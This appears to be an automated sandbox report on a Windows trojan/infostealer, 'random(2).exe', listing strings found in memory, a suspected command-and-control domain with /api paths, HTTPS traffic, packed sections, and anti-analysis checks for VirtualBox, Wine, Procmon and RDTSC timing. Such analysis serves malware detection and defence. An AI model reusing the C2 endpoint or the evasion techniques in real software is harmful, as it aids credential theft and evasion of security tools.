Source: random(2).exe, 00000000.00000003.1342785210.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1341512137.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1340703085.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1342026490.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, A208202A6FDD4002.dat.0.dr | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: random(2).exe, 00000000.00000003.1542133764.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1542364026.0000000005B0E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: random(2).exe, 00000000.00000003.1542133764.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1542748938.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1557258128.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1558684542.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1567247573.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1546836990.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000002.1597998557.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: random(2).exe, 00000000.00000003.1341512137.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1340703085.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1342026490.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, A208202A6FDD4002.dat.0.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: random(2).exe, 00000000.00000003.1341512137.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1340703085.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1342026490.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, A208202A6FDD4002.dat.0.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: random(2).exe, 00000000.00000003.1341512137.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1340703085.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1342026490.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, A208202A6FDD4002.dat.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: random(2).exe, 00000000.00000003.1567247573.0000000005AE1000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1365385074.0000000001207000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://earthsymphzony.today/
                Source: random(2).exe, 00000000.00000003.1542414145.0000000001207000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://earthsymphzony.today/a
                Source: random(2).exe, 00000000.00000003.1542414145.0000000001207000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://earthsymphzony.today/a$
                Source: random(2).exe, 00000000.00000003.1542414145.0000000001207000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1547145549.000000000121F000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1546935640.000000000120D000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1593600134.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1558835674.000000000121F000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1582475958.000000000121B000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1547103339.0000000001213000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000002.1595595282.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1592957728.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1567432553.000000000120D000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1557428973.0000000001215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://earthsymphzony.today/api
                Source: random(2).exe, 00000000.00000003.1593600134.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000002.1595595282.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1592957728.00000000011CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://earthsymphzony.today/api288
                Source: random(2).exe, 00000000.00000003.1582541164.00000000011CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://earthsymphzony.today/apiEM
                Source: random(2).exe, 00000000.00000002.1595725997.000000000121F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://earthsymphzony.today/apiV
                Source: random(2).exe, 00000000.00000003.1309813518.00000000011B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://earthsymphzony.today/apic
                Source: random(2).exe, 00000000.00000002.1595725997.000000000121F000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1558835674.000000000121F000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1582475958.000000000121B000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1567432553.000000000120D000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1557428973.0000000001215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://earthsymphzony.today/apij
                Source: random(2).exe, 00000000.00000002.1595725997.000000000121F000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1558835674.000000000121F000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1582475958.000000000121B000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1567432553.000000000120D000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1557428973.0000000001215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://earthsymphzony.today/apime
                Source: random(2).exe, 00000000.00000002.1597998557.0000000005B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://earthsymphzony.today/apix
                Source: random(2).exe, 00000000.00000002.1595725997.000000000121F000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1582475958.000000000121B000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1567432553.000000000120D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://earthsymphzony.today/apiy
                Source: random(2).exe, 00000000.00000003.1542414145.0000000001207000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://earthsymphzony.today/b
                Source: random(2).exe, 00000000.00000003.1542414145.0000000001207000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://earthsymphzony.today/m
                Source: random(2).exeString found in binary or memory: https://earthsymphzony.today:443/api
                Source: random(2).exe, 00000000.00000003.1567432553.0000000001232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://earthsymphzony.today:443/api&
                Source: random(2).exe, 00000000.00000003.1542133764.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1542748938.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1542364026.0000000005B0E000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1546836990.0000000005B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
                Source: CAB34A9C016C4162.dat.0.drString found in binary or memory: https://support.mozilla.org
                Source: CAB34A9C016C4162.dat.0.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: random(2).exe, 00000000.00000003.1377768758.0000000005C00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: CAB34A9C016C4162.dat.0.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
                Source: random(2).exe, 00000000.00000003.1542133764.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1542748938.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1546836990.0000000005B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
                Source: random(2).exe, 00000000.00000003.1547185152.00000000011C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/3&
                Source: random(2).exe, 00000000.00000003.1309766072.0000000001207000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1310008327.00000000011CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                Source: random(2).exe, 00000000.00000003.1309766072.0000000001207000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1310008327.00000000011CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
                Source: random(2).exe, 00000000.00000003.1342785210.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1341512137.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1340703085.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1342026490.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, A208202A6FDD4002.dat.0.drString found in binary or memory: https://www.ecosia.org/newtab/
                Source: random(2).exe, 00000000.00000003.1341512137.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1340703085.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1342026490.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, A208202A6FDD4002.dat.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: random(2).exe, 00000000.00000003.1542748938.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1557258128.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1558684542.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1567247573.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1546836990.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000002.1597998557.0000000005B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source
                Source: random(2).exe, 00000000.00000003.1542133764.0000000005B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: CAB34A9C016C4162.dat.0.drString found in binary or memory: https://www.mozilla.org
                Source: CAB34A9C016C4162.dat.0.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
                Source: CAB34A9C016C4162.dat.0.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
                Source: random(2).exe, 00000000.00000003.1377768758.0000000005C00000.00000004.00000800.00020000.00000000.sdmp, CAB34A9C016C4162.dat.0.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
                Source: CAB34A9C016C4162.dat.0.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: random(2).exe, 00000000.00000003.1377768758.0000000005C00000.00000004.00000800.00020000.00000000.sdmp, CAB34A9C016C4162.dat.0.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49703 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49725 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49834 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49844 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49857 version: TLS 1.2

                System Summary

                Source: random(2).exe | Static PE information: section name:
                Source: random(2).exe | Static PE information: section name: .idata
                Source: random(2).exe | Static PE information: section name:
                Source: C:\Users\user\Desktop\random(2).exe | Code function: 0_3_011DA649
                Source: C:\Users\user\Desktop\random(2).exe | Code function: 0_3_011D3D6E
                Source: C:\Users\user\Desktop\random(2).exe | Code function: 0_3_011AE25C
                Source: C:\Users\user\Desktop\random(2).exe | Code function: 0_3_011AE243
                Source: random(2).exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: random(2).exe | Static PE information: Section: ZLIB complexity 0.999706737987988
                Source: random(2).exe | Static PE information: Section: cnerjxoh ZLIB complexity 0.994536225341721
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/12@9/1
                Source: C:\Users\user\Desktop\random(2).exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: random(2).exe, 00000000.00000003.1354339352.0000000005B17000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1341253608.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1354116413.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1337301138.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1338136673.0000000005B17000.00000004.00000800.00020000.00000000.sdmp, E8404DBFAF5F23C4.dat.0.dr, A5D70FE1DD113C55.dat.0.dr, BD860E4BC5A83783.dat.0.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: random(2).exe | Virustotal: Detection: 56%
                Source: random(2).exe | ReversingLabs: Detection: 55%
                Source: C:\Users\user\Desktop\random(2).exe | File read: C:\Users\user\Desktop\random(2).exe
                Source: C:\Users\user\Desktop\random(2).exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\random(2).exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\random(2).exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\random(2).exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\random(2).exe | Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\random(2).exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\random(2).exe | Section loaded: webio.dll
                Source: C:\Users\user\Desktop\random(2).exe | Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\random(2).exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\random(2).exe | Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\random(2).exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\random(2).exe | Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\random(2).exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\random(2).exe | Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\random(2).exe | Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\random(2).exe | Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\random(2).exe | Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\random(2).exe | Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\random(2).exe | Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\random(2).exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\random(2).exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\random(2).exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\random(2).exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\random(2).exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\random(2).exe | Section loaded: dpapi.dll
                Source: C:\Users\user\Desktop\random(2).exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\random(2).exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\random(2).exe | Section loaded: wbemcomn.dll
                Source: C:\Users\user\Desktop\random(2).exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\random(2).exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\random(2).exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\random(2).exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\random(2).exe | Section loaded: ntmarta.dll
                Source: random(2).exe | Static file information: File size 1835008 > 1048576
                Source: random(2).exe | Static PE information: Raw size of cnerjxoh is bigger than: 0x100000 < 0x192600

                Data Obfuscation

                Source: C:\Users\user\Desktop\random(2).exe | Unpacked PE file: 0.2.random(2).exe.5e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cnerjxoh:EW;ebptfdwj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cnerjxoh:EW;ebptfdwj:EW;.taggant:EW;
                Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
                Source: random(2).exe | Static PE information: real checksum: 0x1c825f should be: 0x1c1781
                Source: random(2).exe | Static PE information: section name:
                Source: random(2).exe | Static PE information: section name: .idata
                Source: random(2).exe | Static PE information: section name:
                Source: random(2).exe | Static PE information: section name: cnerjxoh
                Source: random(2).exe | Static PE information: section name: ebptfdwj
                Source: random(2).exe | Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\random(2).exe | Code function: 0_3_011D1B66 push esi; iretd 0_3_011D1B69
                Source: C:\Users\user\Desktop\random(2).exe | Code function: 0_3_011D1B86 push ss; retf 0_3_011D1B8D
                Source: C:\Users\user\Desktop\random(2).exe | Code function: 0_3_011D1B80 push eax; retf 0_3_011D1B85
                Source: C:\Users\user\Desktop\random(2).exe | Code function: 0_3_0119E963 pushad ; iretd 0_3_0119E969
                Source: C:\Users\user\Desktop\random(2).exe | Code function: 0_3_011AC31E push eax; ret 0_3_011AC349
                Source: C:\Users\user\Desktop\random(2).exe | Code function: 0_3_011AC25C pushad ; ret 0_3_011AC355
                Source: C:\Users\user\Desktop\random(2).exe | Code function: 0_3_011AE25C push eax; iretd 0_3_011AE4EC
                Source: C:\Users\user\Desktop\random(2).exe | Code function: 0_3_011AE243 push eax; iretd 0_3_011AE4EC
                Source: random(2).exe | Static PE information: section name: entropy: 7.977249264089444
                Source: random(2).exe | Static PE information: section name: cnerjxoh entropy: 7.954038506762716

                Boot Survival

                Source: C:\Users\user\Desktop\random(2).exe | Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\random(2).exe | Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\random(2).exe | Window searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\random(2).exe | Window searched: window name: Regmonclass
                Source: C:\Users\user\Desktop\random(2).exe | Window searched: window name: Filemonclass
                Source: C:\Users\user\Desktop\random(2).exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\Desktop\random(2).exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\random(2).exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\random(2).exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\random(2).exe | System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\random(2).exe | File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\random(2).exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B86C3 second address: 7B8705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 xor dword ptr [esp], 451B503Eh 0x0000000e sbb si, 2EE7h 0x00000013 lea ebx, dword ptr [ebp+1244C24Ch] 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007F8314EA9188h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 00000017h 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 movsx edx, dx 0x00000036 xchg eax, ebx 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push ecx 0x0000003c pop ecx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B8705 second address: 7B8714 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B87C2 second address: 7B8806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 sub dword ptr [ebp+122D19BEh], edi 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007F8314EA9188h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a mov ecx, dword ptr [ebp+122D397Dh] 0x00000030 push C60C050Fh 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 jl 00007F8314EA9186h 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B8806 second address: 7B8822 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B8822 second address: 7B8826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B8826 second address: 7B88A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a add dword ptr [esp], 39F3FB71h 0x00000011 mov ecx, 47217D8Bh 0x00000016 push 00000003h 0x00000018 mov esi, dword ptr [ebp+122D1FAEh] 0x0000001e sub edx, dword ptr [ebp+122D3A65h] 0x00000024 push 00000000h 0x00000026 mov dword ptr [ebp+122D1A8Bh], eax 0x0000002c push 00000003h 0x0000002e or dword ptr [ebp+122D306Fh], edx 0x00000034 pushad 0x00000035 push edi 0x00000036 mov dword ptr [ebp+122D308Ah], esi 0x0000003c pop ebx 0x0000003d add ax, 02BBh 0x00000042 popad 0x00000043 call 00007F83146B40C9h 0x00000048 jne 00007F83146B40DCh 0x0000004e push eax 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F83146B40CDh 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B88A9 second address: 7B88BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8314EA918Ch 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B88BD second address: 7B8942 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F83146B40D8h 0x00000013 mov eax, dword ptr [eax] 0x00000015 jmp 00007F83146B40CEh 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e ja 00007F83146B40CEh 0x00000024 pop eax 0x00000025 push 00000000h 0x00000027 push ebp 0x00000028 call 00007F83146B40C8h 0x0000002d pop ebp 0x0000002e mov dword ptr [esp+04h], ebp 0x00000032 add dword ptr [esp+04h], 00000017h 0x0000003a inc ebp 0x0000003b push ebp 0x0000003c ret 0x0000003d pop ebp 0x0000003e ret 0x0000003f xor esi, 399D2605h 0x00000045 lea ebx, dword ptr [ebp+1244C257h] 0x0000004b add esi, 5714BCAFh 0x00000051 push eax 0x00000052 pushad 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B8942 second address: 7B894D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B894D second address: 7B8951 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D7FCB second address: 7D800A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F8314EA9199h 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007F8314EA918Eh 0x00000016 jnl 00007F8314EA918Eh 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7A4623 second address: 7A463E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a ja 00007F83146B40C6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7A463E second address: 7A4644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D61A2 second address: 7D61A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7D6562 second address: 7D6566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
